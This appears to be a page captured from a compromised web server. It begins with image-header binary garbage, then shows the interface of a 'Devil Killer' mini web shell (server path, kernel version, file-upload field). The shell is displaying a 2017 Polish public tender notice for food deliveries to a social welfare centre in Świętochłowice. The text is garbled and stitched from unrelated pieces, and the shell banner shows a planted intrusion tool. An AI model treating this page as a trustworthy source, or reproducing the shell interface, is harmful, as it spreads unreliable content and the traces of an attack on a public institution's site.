JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170113/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170113/7736-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.ops.swietochlowice.info' target='_blank'>http://www.ops.swietochlowice.info</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 7736 - 2017
              z dnia 2017-01-13 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Świętochłowice: Dostawa artykułów spożywczych dla Ośrodka Pomocy Społecznej w Świętochłowicach<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Dostawy
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Ośrodek Pomocy Społecznej w Świętochłowicach , krajowy numer identyfikacyjny
              003452062, ul.
              ul. Katowicka 
              35,
              41-600  
              Świętochłowice, woj.
              śląskie, państwo
              Polska, tel.
              322 455 104, e-mail
              organizacyjnoprawny@ops.internetdsl.pl, faks
              322 455 104.
              <br />
              Adres strony internetowej (URL): www.ops.swietochlowice.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Inny: pomoc społeczna</div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />www.ops.swietochlowice.info</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.ops.swietochlowice.info</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />pocztą<br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br />
                Adres:
                <br />Świętochłowice, ul. Katowicka 35</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Dostawa artykułów spożywczych dla Ośrodka Pomocy Społecznej w Świętochłowicach<br /><b>Numer referencyjny: </b>3201-01/2017<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                dostawy
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b><br />1<br /><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>1.	Przedmiotem zamówienia jest dostawa artykułów żywnościowych dla Ośrodka Pomocy Społecznej w Świętochłowicach wraz z wniesieniem i rozładunkiem  w  magazynach Dziennego Domu Senior- WIGOR przy ul. Imieli 12 oraz ul. Katowickiej 35 w Świętochłowicach.
2.	Przykładowy asortyment przedmiotu zamówienia określa załącznik nr 2 do niniejszej SIWZ  tabela artykułów .Ilości artykułów podane w tabeli posiadają wartość szacunkową i będą uzależnione od aktualnych potrzeb Zamawiającego.
3.	Dostawy realizowane będą na podstawie zamówienia pisemnego przesyłanego faksem lub składanego telefonicznie w każdym następnym dniu po zgłoszeniu zamówienia lub
w innym terminie uzgodnionym z Zamawiającym, w dni powszednie codziennie od
poniedziałku do soboty w  godzinach od 07:00 do 10:00. 
4.	Wykonawca zobowiązany będzie do: bezpłatnego dowozu towaru transportem spełniającym wymagania sanitarne, należytego zabezpieczenia towaru na czas przewozu (opakowania, pojemniki przystosowane do przewozu danego asortymentu), wniesienia wraz z rozładunkiem w magazynie określonym w ust. 1 niniejszego paragrafu, i weźmie na siebie całkowitą odpowiedzialność za towar do momentu jego odbioru w magazynie Zamawiającego oraz  poniesie z tego tytułu wszelkie skutki prawne.
5.	Wykonawca zobowiązany będzie dostarczać zamawiany towar bezwzględnie w dni oraz
w godzinach wyznaczonych przez Zamawiającego.
6.	Wykonawca zobowiązany będzie dostarczyć towar I klasy jakości, świeży, z okresami ważności
odpowiednimi dla danego asortymentu, wysokiej jakości sensorycznej i mikrobiologicznej.
7.	Każdy produkt musi być dopuszczony do obrotu i sprzedaży zgodnie z obowiązującymi
przepisami,  oraz z warunkami określonymi w SIWZ, musi  posiadać początkowy  termin
przydatności do spożycia. (Po podpisaniu umowy wymagane będzie dostarczenie karty
produktu, zgodnie  z obowiązującymi przepisami unijnymi w tym zakresie).
<br /><br /><b>II.5) Główny kod CPV: </b>15000000-8<br /><br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 31/12/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b>Zamawiający nie przewiduje  możliwości  składania ofert częściowych 
Zamawiający  nie przewiduje możliwości udzielania zamówień uzupełniających
Zamawiający  nie przewiduje  możliwości składania ofert wariantowych 
Zamawiający nie przewiduje aukcji elektronicznej
Zamawiający nie przewiduje zawarcia  umowy ramowej
</div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                oświadczenie o spełnianiu warunków udziału w postępowaniu  wg wzoru stanowiącego załącznik nr 4 do SIWZ.<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                oświadczenie o spełnianiu warunków udziału w postępowaniu  wg wzoru stanowiącego załącznik nr 4 do SIWZ.<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                oświadczenie o spełnianiu warunków udziału w postępowaniu  wg wzoru stanowiącego załącznik nr 4 do SIWZ.<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">- oświadczenie w zakresie braku podstaw do wykluczenia z postępowania o udzielenie zamówienia publicznego  wg wzoru stanowiącego załącznik nr 3 do SIWZ,
- w formie oryginału lub kopii potwierdzonej za zgodność z oryginałem, odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji,  zgodnie z art. 24 ust. 5 pkt 1 Pzp,
- w okolicznościach, o których mowa w art. 24 ust. 1 pkt 23 Pzp, Wykonawca winien złożyć oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej - wg wzoru stanowiącego załącznik nr 5 do SIWZ.
5.	W przypadku wskazania przez Wykonawcę dostępności oświadczeń lub dokumentów w formie elektronicznej pod określonymi adresami internetowymi ogólnodostępnych i bezpłatnych baz danych, Zamawiający pobiera samodzielnie z tych baz  danych wskazane przez Wykonawcę oświadczenia lub dokumenty.
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />oświadczenie o spełnianiu warunków udziału w postępowaniu  wg wzoru stanowiącego załącznik nr 4 do SIWZ.<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px"></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>termin płatności faktur</td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />4.	Zmiany niniejszej umowy mogą nastąpić w przypadkach:
1)	zmiany przepisów prawnych, w tym zmiany podatku VAT o różnicę wynikającą z jej dotychczasowej wielkości a wprowadzoną zmianą,
2)	zmiany nazwy towaru w przypadku, kiedy nowy towar spełnia wszystkie parametry towaru, który przestał być wytwarzany,
3)	zmiany okoliczności, których Zamawiający, działając z należytą starannością, nie mógł przewidzieć, a wartość nie przekracza 50% wartości określonej w niniejszej umowie,
4)	wprowadzenia zmian korzystnych dla Zamawiającego,
5)	wystąpienia sytuacji  niezależnych od stron umowy i działania siły wyższej (powódź, pożar, zamieszki, strajki, ataki terrorystyczne, przerwy w dostawie energii elektrycznej) mające wpływ na realizację umowy.
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 24/01/2017, godzina: 09:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
